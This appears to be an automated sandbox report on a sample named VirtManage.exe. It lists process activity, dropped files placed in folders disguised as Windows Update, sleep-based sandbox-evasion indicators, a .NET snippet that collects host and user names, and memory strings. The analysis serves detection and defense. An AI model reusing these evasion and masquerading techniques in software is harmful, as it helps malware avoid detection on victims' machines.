Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Microsoft\LogUpdateWindows\oleview.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Microsoft\LogUpdateWindows\oleview.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Microsoft\LogUpdateWindows\oleview.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

barindex
.NET source code contains a domain name check
Source: 27.2.powershell.exe.21bb4f3ca58.0.raw.unpack, MqVvxIfGQaR.cs.Net Code: string.Format("{0} {1}\\{2}", Environment.GetEnvironmentVariable("COMPUTERNAME"), Environment.GetEnvironmentVariable("USERDOMAIN"), Environment.GetEnvironmentVariable("USERNAME"))
Source: 27.2.powershell.exe.21bcc9b0000.1.raw.unpack, MqVvxIfGQaR.cs.Net Code: string.Format("{0} {1}\\{2}", Environment.GetEnvironmentVariable("COMPUTERNAME"), Environment.GetEnvironmentVariable("USERDOMAIN"), Environment.GetEnvironmentVariable("USERNAME"))
Source: b0okydtw.dll.33.dr, MqVvxIfGQaR.cs.Net Code: string.Format("{0} {1}\\{2}", Environment.GetEnvironmentVariable("COMPUTERNAME"), Environment.GetEnvironmentVariable("USERDOMAIN"), Environment.GetEnvironmentVariable("USERNAME"))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\VirtManage.exeWindow / User API: threadDelayed 2387Jump to behavior
Source: C:\Users\user\Desktop\VirtManage.exeWindow / User API: threadDelayed 7534Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4999
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4867
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6949
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2734
Source: C:\Users\user\Desktop\VirtManage.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsh85A.tmp\nsis7z.dllJump to dropped file
Source: C:\Windows\SysWOW64\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI3323.tmpJump to dropped file
Source: C:\Users\user\Desktop\VirtManage.exeDropped PE file which has not been started: C:\ProgramData\Microsoft\WindowsUpdate24\gpg-agent.exeJump to dropped file
Source: C:\Users\user\Desktop\VirtManage.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsh85A.tmp\nsExec.dllJump to dropped file
Source: C:\ProgramData\Microsoft\WindowsUpdate24\7za.exeDropped PE file which has not been started: C:\ProgramData\Microsoft\WindowsUpdate24\aclui-2.dllJump to dropped file
Source: C:\Windows\SysWOW64\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI32C4.tmpJump to dropped file
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exeDropped PE file which has not been started: C:\ProgramData\Microsoft\WindowsUpdate24\7za.dllJump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\b0okydtw\b0okydtw.dllJump to dropped file
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exeAPI coverage: 0.5 %
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exeAPI coverage: 0.4 %
Source: C:\Users\user\Desktop\VirtManage.exe TID: 6668Thread sleep time: -238700s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\VirtManage.exe TID: 6668Thread sleep time: -753400s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2244Thread sleep count: 4999 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2244Thread sleep count: 4867 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5524Thread sleep time: -7378697629483816s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5336Thread sleep count: 6949 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1488Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5764Thread sleep count: 2734 > 30
Source: C:\Windows\System32\svchost.exe TID: 6984Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 8108Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Users\user\Desktop\VirtManage.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Users\user\Desktop\VirtManage.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Users\user\Desktop\VirtManage.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Users\user\Desktop\VirtManage.exeCode function: 0_2_004068D4 FindFirstFileW,FindClose,0_2_004068D4
Source: C:\Users\user\Desktop\VirtManage.exeCode function: 0_2_00405C83 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405C83
Source: C:\Users\user\Desktop\VirtManage.exeCode function: 0_2_00402930 FindFirstFileW,0_2_00402930
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exeCode function: 1_2_004CC650 strpbrk,FindFirstFileW,gcry_free,strlen,gcry_malloc,gcry_free,FindNextFileW,FindClose,gcry_free,FindClose,gcry_free,FindClose,1_2_004CC650
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exeCode function: 3_2_004CC650 strpbrk,FindFirstFileW,gcry_free,strlen,gcry_malloc,gcry_free,FindNextFileW,FindClose,gcry_free,FindClose,gcry_free,FindClose,3_2_004CC650
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: gpg.exe, 00000005.00000002.922570019.0000000000828000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllU
Source: powershell.exe, 0000001E.00000002.1219498455.0000016E19906000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tEventVmNetworkAdapter',
Source: powershell.exe, 0000001E.00000002.1219498455.0000016E19906000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'Remove-NetEventVmNetworkAdapter',
Source: powershell.exe, 0000001E.00000002.1219498455.0000016E19906000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-NetEventVmNetworkAdapterX
Source: powershell.exe, 0000001E.00000002.1219498455.0000016E183F7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-NetEventVmNetworkAdapter
Source: powershell.exe, 0000001B.00000002.3339050433.0000021BB593A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ID": "QA3C3Spv34bEjMK7", "Data": "cFmIaqHEfnCmyBPGZRwJvLftovbBJzGgMaibCBmGQkGgdCHEtLVakyxvlnGuRyThDLXneCtjSwQGYlNCiZzipEygHmlodpVWPXpIwyExIWpzqfkkJMwuMxLryCCfrqDUlkYArlhAlZWVYTZNoZIEukXpNSShYZxZoeyLexinkjQAoEbVxJBfNHlYFTSTAefMssQlZgJOeleyBLCXWlvtNQxLbyoWufwnHfNFOlCsvHFbDLPOjSdBbQLImirtZAGuxcBzKUZAqENNkTDTqxcxcZEAcRfuDScBuVqlWtoqxWRzZzXvalEjednWTZSVgPgxKJRhShzgDhUWkWVbMKaqCxEvkNElwNKyVSppgkiLPlxYnLXetDgyfHKSvYQELXbgELMeUlXAXIkWXTQgGRDINnUOqOoynuZyGoLHqgSYWIAkUPrAbUoJxfblvFpGqocgIJTCAEsKSvzTNGVGknicwpfRbBfNOWFcFrcrJrxMnRIxipaplxmVZbtDsUWPrIOJhqjUOtrmaGNelteJyYLhuaXGZBaRtTrIWWvGhWPilmcCTUAomNXtQAorMtGXAujmRyVugqnEexGVjTMMnNNevchXuCwAxLUlQEhUzpbZZyAsSDJtCOLqqxuVbTHnovpheklTeCzQsMrdBzuarVyYCDqKvoUtuxlvUZoyLmElzQoRsUmUvbXfULtJkkiyAisFxlJMJqpgSvHVgdqyUbwMKxgewowQMKVwdbgTNKeGEVhsPbzpBoYijzROPgqgcfHYnOQcOcNaInCpwjkXZvZhlPHGFSqMhHyzSHXlvgjPPrIHwrihksbVKSjWUzsdsBTVYgixIXPgNujMSMSnCqadCNzvagqVRlcdeaCCYpAuBDQAomShpNDFKsQLOpFLw"}p
Source: powershell.exe, 0000001E.00000002.1219498455.0000016E19906000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-NetEventVmNetworkAdapterX
Source: powershell.exe, 0000001E.00000002.1219498455.0000016E19906000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: +MSFT_NetEventVmNetworkAdatper.format.ps1xmlX
Source: powershell.exe, 0000001E.00000002.1219498455.0000016E19906000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-NetEventVmNetworkAdapterX
Source: powershell.exe, 0000001B.00000002.3414690740.0000021BCCC20000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000020.00000002.2851637829.0000021ACEA44000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000020.00000002.2851840157.0000021ACEA56000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: gpg.exe, 0000000A.00000002.978724317.0000000000938000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllrrn
Source: powershell.exe, 0000001E.00000002.1219498455.0000016E19906000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: #MSFT_NetEventVmNetworkAdatper.cdxmlX
Source: gpg.exe, 00000011.00000002.1005998234.00000000009C7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll+
Source: powershell.exe, 0000001E.00000002.1219498455.0000016E19906000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'Add-NetEventVmNetworkAdapter',
Source: powershell.exe, 0000001E.00000002.1219498455.0000016E183F7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-NetEventVmNetworkAdapter
Source: gpg.exe, 00000001.00000002.911511780.0000000000937000.00000004.00000020.00020000.00000000.sdmp, gpg.exe, 00000003.00000002.916722216.00000000008B7000.00000004.00000020.00020000.00000000.sdmp, w32tm.exe, 00000010.00000002.1001816369.000001FA2CB46000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: powershell.exe, 0000001B.00000002.3339050433.0000021BB593A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: cFmIaqHEfnCmyBPGZRwJvLftovbBJzGgMaibCBmGQkGgdCHEtLVakyxvlnGuRyThDLXneCtjSwQGYlNCiZzipEygHmlodpVWPXpIwyExIWpzqfkkJMwuMxLryCCfrqDUlkYArlhAlZWVYTZNoZIEukXpNSShYZxZoeyLexinkjQAoEbVxJBfNHlYFTSTAefMssQlZgJOeleyBLCXWlvtNQxLbyoWufwnHfNFOlCsvHFbDLPOjSdBbQLImirtZAGuxcBzKUZAqENNkTDTqxcxcZEAcRfuDScBuVqlWtoqxWRzZzXvalEjednWTZSVgPgxKJRhShzgDhUWkWVbMKaqCxEvkNElwNKyVSppgkiLPlxYnLXetDgyfHKSvYQELXbgELMeUlXAXIkWXTQgGRDINnUOqOoynuZyGoLHqgSYWIAkUPrAbUoJxfblvFpGqocgIJTCAEsKSvzTNGVGknicwpfRbBfNOWFcFrcrJrxMnRIxipaplxmVZbtDsUWPrIOJhqjUOtrmaGNelteJyYLhuaXGZBaRtTrIWWvGhWPilmcCTUAomNXtQAorMtGXAujmRyVugqnEexGVjTMMnNNevchXuCwAxLUlQEhUzpbZZyAsSDJtCOLqqxuVbTHnovpheklTeCzQsMrdBzuarVyYCDqKvoUtuxlvUZoyLmElzQoRsUmUvbXfULtJkkiyAisFxlJMJqpgSvHVgdqyUbwMKxgewowQMKVwdbgTNKeGEVhsPbzpBoYijzROPgqgcfHYnOQcOcNaInCpwjkXZvZhlPHGFSqMhHyzSHXlvgjPPrIHwrihksbVKSjWUzsdsBTVYgixIXPgNujMSMSnCqadCNzvagqVRlcdeaCCYpAuBDQAomShpNDFKsQLOpFLwXX>
Source: powershell.exe, 0000001E.00000002.1219498455.0000016E19906000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'MSFT_NetEventVmNetworkAdatper.cdxml',
